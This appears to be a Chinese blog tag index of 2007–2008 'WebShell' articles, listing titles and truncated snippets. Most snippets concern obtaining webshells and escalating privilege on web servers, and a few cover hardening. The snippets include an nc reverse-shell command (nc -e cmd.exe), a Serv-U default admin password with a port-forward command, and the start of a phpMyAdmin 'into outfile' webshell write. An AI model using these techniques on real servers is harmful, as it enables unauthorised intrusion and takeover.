WebShell

解除TCP/IP限制的小技巧

1.用NC反弹得到一个shell本机监听NC-l-p32WEBSHELL运行:x:\xxx\serv-u.exe"x:\xxx\nc.exe-ecmd.exe*.*.*.
lddgh314·2008-01-04 21:57

ASP木马Webshell安全解决办案

ASP木马、Webshell之安全防范解决办法正文内容:   注意:本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER  
happyjack·2007-12-29 10:00

一次web 挂马所作出服务器的对策

一次web挂马所作出服务器的对策webshell安全使用FSO主机:一个简单的虚拟主机存在各种WEBSHELL的威胁的,假如你给朋友开了个虚拟主机空间,那么这个虚拟主机存在的最大安全隐患将会是FSO权限问题
zhengxx·2007-12-26 15:50

Cmd的终极防守

也有利用web程序的漏洞得到一个webshell然后利用低权限的cmdshell来提升权限,最后再种植后门……各种各样的攻击都说明入侵和cmd.exe是相关的,因为一个cmd.exe就是一个用户与系
太阳照常升起,我依然活着·2007-12-24 00:00

phpbb后台拿webshell的方法

可是进入了后台要获取Webshell就有点麻烦了,PHPBB旧版本还可以直接添加上传类型为PHP的文件,然后直接上传PHP的后门得到Webshell
linkboy·2007-12-10 12:00

phpbb后台拿webshell的方法

可是进入了后台要获取Webshell就有点麻烦了,PHPBB旧版本还可以直接添加上传类型为PHP的文件,然后直接上传PHP的后门得到Webshell
linkboy·2007-12-10 12:00

MS07-017 windows 2000 and windows xp sp2 真正修改能用版本(fixed)

测试通过网上流传的都TMD垃圾不能用,不知道抄来抄去转来转去哪些代码转错了这个是我自己修改过的http://www.blogjava.net/Files/baicker/ms07017.rar修正win2k下webshell
酒水不犯茶水·2007-11-26 22:00

ASP.NET虚拟主机安全漏洞解决方案

在网上无意中发现了一个叫做webadmin的asp.net-webshell,对自己的服务器进行测试的时候
nutian·2007-11-21 15:00

利用新云网站管理系统漏洞成功获取某大型书店Webshell

利用新云网站管理系统漏洞成功获取某大型书店Webshell声明:本文仅做安全技术研究,请勿用来做违法事!
simeon2005·2007-11-18 21:33

利用新云网站管理系统漏洞成功获取某大型书店Webshell

利用新云网站管理系统漏洞成功获取某大型书店Webshell声明:本文仅做安全技术研究,请勿用来做违法事!
simeon2005·2007-11-18 21:33

Windows安全配置技术

一Windows下安全权限设置详解随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB
suifeng1984·2007-11-15 14:01

详细讲解Windows下的权限设置

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
starger·2007-11-05 16:26

详解Windows下的权限设置方法

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
·2007-10-28 16:43

不为人知的动网7.1 SQL版注入漏洞

文章难易度:★★★文章阅读点:动网7.1SQL版最新注入漏洞的详细利用以及如何在后台获取Webshell话说上期X档案刊登了动网8.0SQL版最新注入漏洞的文章,不知大家都掌握了没有,令人兴奋的是,没过几在就又暴出了另一个动网
linkboy·2007-10-19 21:00

不为人知的动网7.1 SQL版注入漏洞

文章难易度:★★★文章阅读点:动网7.1SQL版最新注入漏洞的详细利用以及如何在后台获取Webshell话说上期X档案刊登了动网8.0SQL版最新注入漏洞的文章,不知大家都掌握了没有,令人兴奋的是,没过几在就又暴出了另一个动网
linkboy·2007-10-19 21:00

检测周杰伦官方网站

在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回如图1错误提示是Youha
foxhack·2007-10-01 12:10

MSSQL注入PUBLIC权限下的xp_dirtree再度利用

2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...正文:提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell
inject2006·2007-09-18 13:00

WEBSHELL权限提升技巧

WEBSHELL权限提升技巧c:d:e:.....C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U
qiannianchong·2007-09-15 19:38

Windows下权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
lijiajun84·2007-09-12 15:35

用GOOGLE你瞬间成为黑客

googlehacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.googlehacking其实并非如此简单...googlehacking的简单实现使用
hhlenglish·2007-08-23 22:39

用GOOGLE你瞬间成为黑客

googlehacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.googlehacking其实并非如此简单...googlehacking的简单实现使用
hhlenglish·2007-08-23 22:39

45种可以拿到Webshell的程序

45种可以拿到Webshell的程序1,到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库!
hiwish·2007-08-07 05:00

do all things in asp ―― shell注入1.0asp版

软件作者:沉渊(bloodsword)信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])以前一直有写个webshell环境下运行的注入工具的想法。
foxhack·2007-08-02 10:55

do all things in asp ―― shell注入1.0asp版

软件作者:沉渊(bloodsword)信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])以前一直有写个webshell环境下运行的注入工具的想法。
foxhack·2007-08-02 10:55

Webshell与Serv-u结合获系统最高权限

Serv-U默认监听127.0.0.1:43958,在本机才能连接这个管理端口,Serv-U默认管理账号是localAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe-v-l12345-r43958127.0.0.1,然后在你自己的机器,用"Serv-Uadministrator"新建SERVER。目标IP:12345User:Lo
cnbird2008·2007-08-01 10:00

dvbbs8.0获得webshell方法

根据测试 End if       backpath=server.mappath(backpath)       If Lcase(Mid(backpath,instrRev(backpath,".")+1))<>"mdb"
·2007-07-19 09:00

红客必学:Windows权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
mumusheng·2007-07-12 11:19

红客必学:Windows权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
mumusheng·2007-07-12 11:19

利用ASP上传漏洞得到webshell实战

利用上传漏洞得到webshell,再配合Serv-U取得server管理员权限可以说是2004年网络安全届的经典漏洞!  
cnbird2008·2007-06-19 10:00

突破SQL错误提示上传webshell

文章作者:疯狗[url]http://www.cnbct.org/[/url]得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个
foxhack·2007-05-21 18:55

突破SQL错误提示上传webshell

文章作者:疯狗[url]http://www.cnbct.org/[/url]得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个
foxhack·2007-05-21 18:55

10月28号安全焦点DDOS事件背后内幕串串烧

同时奉送ASP.NET备份db日志获得webshell小知识,小小伎俩,牛人莫笑话俺了。本贴纯属娱乐大众!慰安下各位fans在安焦被D9天以来无法灌水的损失。
foxhack·2007-05-14 16:41

10月28号安全焦点DDOS事件背后内幕串串烧

同时奉送ASP.NET备份db日志获得webshell小知识,小小伎俩,牛人莫笑话俺了。本贴纯属娱乐大众!慰安下各位fans在安焦被D9天以来无法灌水的损失。
foxhack·2007-05-14 16:41

第一个支持2000和2003下完美进行用户克隆的C源码(可在webshell里直接运行)

第一个支持2000和2003下完美进行用户克隆的C源码(可在webshell里直接运行)软件作者:pt007[at]vip.sina.com版权所有,转载请注明版权信息来源:邪恶八进制信息安全团队(www.eviloctal.com
elva·2007-05-14 00:00

全面详尽剖析一句话asp木马

                          备注:QQ:89224874  个人主页:http:fk.3355.cn所谓一句话插马,就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell
xiong2127·2007-05-10 21:38

全面详尽剖析一句话asp木马

                          备注:QQ:89224874  个人主页:http:fk.3355.cn所谓一句话插马,就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell
xiong2127·2007-05-10 21:38

安全使用FSO主机

其实按我们上一节所说的配置一个简单的虚拟主机,这样的主机是存在各种WEBSHELL的威胁的,假如你给朋友开了个虚拟主机空间,那么这个虚拟主机存在的最大安全隐患将会是FSO权限问题,其实FSO的安全隐患在
shaily·2007-05-07 14:00

利用ORACLE系统账户默认口令提升权限(ZT)

主机的配置还算是安全,偏偏一个比较隐藏的目录下残留了upfile.asp,结果轻轻松松的得到了webshell。 接着在主机上逛了逛,拿出superscan从外面扫了下,只开放了80端口。
酒水不犯茶水·2007-04-30 14:00

支持2000和2003下完美进行任意用户克隆

感谢dahubaobao和sinister的指点 WEBSHELL里可执行是指:至少有一个管理员权限的shell,如:jsp/MYSQL/SERV
iiprogram·2007-04-25 16:00

Google高级技巧—google Hack★★★★

googlehacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.googlehacking其实并非如此简单...常用的google关键字:foo1foo2
iiprogram·2007-04-25 16:00

Google高级技巧—google Hack★★★★

googlehacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.googlehacking其实并非如此简单...常用的google关键字:foo1foo2
iiprogram·2007-04-25 16:00

网页挂马的常见方式

在入侵了一个站拿到了webshell的时候,最常见的挂站代码如下:(一)启动时加载一个网页:CODE:(二)加入一个隐藏框架: CODE:把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向
dovemail·2007-04-03 09:43

网页挂马的常见方式

在入侵了一个站拿到了webshell的时候,最常见的挂站代码如下:(一)启动时加载一个网页:CODE:(二)加入一个隐藏框架: CODE:把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向
dovemail·2007-04-03 09:43

网站程序安全分析器

等脚本WebShell
dovemail·2007-03-16 13:11

网站程序安全分析器

等脚本WebShell
dovemail·2007-03-16 13:11

网站程序安全分析器

查杀效率更高.修复了重复报告.误报的几率极大的减小.报表也改成HTML格式,提供的数据也相对清晰和易看.本程序通杀目前已知的加密或未加密的ASPASPXPHPCGIJSPVBS与HTML恶意代码...等脚本WebShell
dovemail·2007-03-16 13:11

吐血推荐-巧用网站配置文件提升权限!!!

 巧用网站配置文件提升权限本文已被黑客手册杂志2007年第三期收录朋友给我发来一个Asp的Webshell的地址,然后又给我发了一条消息“痛苦,拿到Webshell,由于权限太低,什么也干不了!
simeon2005·2007-03-12 08:30

吐血推荐-巧用网站配置文件提升权限!!!

巧用网站配置文件提升权限本文已被***手册杂志2007年第三期收录朋友给我发来一个Asp的Webshell的地址,然后又给我发了一条消息“痛苦,拿到Webshell,由于权限太低,什么也干不了!
simeon2005·2007-03-12 08:30

吐血推荐-巧用网站配置文件提升权限!!!

 巧用网站配置文件提升权限本文已被黑客手册杂志2007年第三期收录朋友给我发来一个Asp的Webshell的地址,然后又给我发了一条消息“痛苦,拿到Webshell,由于权限太低,什么也干不了!
simeon2005·2007-03-12 08:30

phpMyAdmin 后台拿webshell

1.如何拿到登陆密码.自己想办法2.访问:http://url/phpmyadmin/libraries/select_lang.lib.php得到物理路径.3.选择一个Database.运行以下语句.----startcode---CreateTABLEa(cmdtextNOTNULL);InsertINTOa(cmd)VALUES('');selectcmdfromaintooutfile'D
·2007-03-08 00:00
上一页 58 59 60 61 62 63 64 65 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他